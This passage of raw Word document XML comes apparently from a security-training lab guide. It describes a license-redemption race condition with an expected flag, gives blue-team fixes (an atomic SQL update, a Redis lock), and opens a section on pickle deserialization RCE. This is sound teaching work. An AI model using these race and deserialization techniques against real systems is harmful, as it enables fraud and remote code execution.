                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify over-redemption in license inventory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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After race attack, reload license inventory (↻).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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DEMO-FREE-0001 now shows: Used: 3/1 (or higher) — more seats used than available!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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For NEXUS-GOLD-2024 (50 seats, value ₹5L each), this represents massive financial fraud.</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4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  Expected Result / FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Successfully redeem more than 1 seat on DEMO-FREE-0001 (1-seat license) using 10 parallel requests. used_seats &gt; seats confirmed in inventory. FLAG returned in response when over-limit detected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A7A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Use database-level atomic operations — UPDATE with WHERE check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The fix: combine the check AND the increment in a single atomic SQL statement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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If no row is updated (seats already full), the transaction fails — no race window.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># FIXED — atomic check-and-update in one SQL statement:
@app.route("/api/licenses/redeem", methods=["POST"])
def race_fixed():
    u = jwt_user()
    if not u: return 401
    code = request.get_json().get("code","")
    db   = get_db()
    # Single atomic statement — check AND increment together:
    result = db.execute(
        "UPDATE licenses SET used_seats=used_seats+1, redeemed_by=? "
        "WHERE code=? AND status='active' AND used_seats &lt; seats",
        (u["username"], code)
    )
    db.commit()
    if result.rowcount == 0:
        # Either license not found, or all seats used — cannot tell which without leaking info
        return jsonify({"error": "Redemption failed — no seats available or invalid code"}), 400
    upd = db.execute("SELECT * FROM licenses WHERE code=?", (code,)).fetchone()
    return jsonify({"success": True, "seat": upd["used_seats"], "total": upd["seats"]})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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove the artificial sleep — it widens the race window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The time.sleep(0.15) in the code dramatically increases race window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Even without sleep, real DB latency creates a smaller window — always use atomic ops.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Remove: time.sleep(0.15) from the production code immediately.</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Add application-level distributed lock for critical sections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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For more complex scenarios, use Redis SETNX or database row-level locking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Python threading.Lock() only helps for single-process — use Redis for multi-process.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Redis-based distributed lock:
import redis
r = redis.Redis()
def redeem_with_lock(code, username):
    lock_key = f"lock:license:{code}"
    lock = r.set(lock_key, "1", nx=True, ex=5)  # NX=set only if not exists, 5s expiry
    if not lock:
        return {"error": "Concurrent redemption in progress — try again"}
    try:
        return do_redeem(code, username)  # safe, only one process runs this
    finally:
        r.delete(lock_key)</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A6F1E" w:sz="1"/>
              <w:left w:val="single" w:color="CA6F1E" w:sz="14"/>
              <w:bottom w:val="single" w:color="CA6F1E" w:sz="1"/>
              <w:right w:val="single" w:color="CA6F1E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="CA6F1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Race conditions in payment systems caused millions in fraud. Uber's promo code system was abused via race conditions for free rides. E-commerce flash sales, ticketing systems, and banking transfer limits are all vulnerable to TOCTOU attacks. Fix requires atomic DB operations — not application-level locks alone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8D6E5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="40" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pP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0"/>
        <w:gridCol w:w="8620"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="740"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">V6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8620"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure Deserialization — Pickle RCE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Advanced ]</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276" w:sz="1"/>
              <w:left w:val="single" w:color="1A5276" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="1"/>
              <w:right w:val="single" w:color="1A5276" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📖  What Is This Vulnerability?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Python's pickle module can serialize any Python object — including ones with custom __reduce__ methods that execute arbitrary code on deserialization. The session import endpoint calls pickle.loads() on user-supplied base64 data, enabling Remote Code Execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
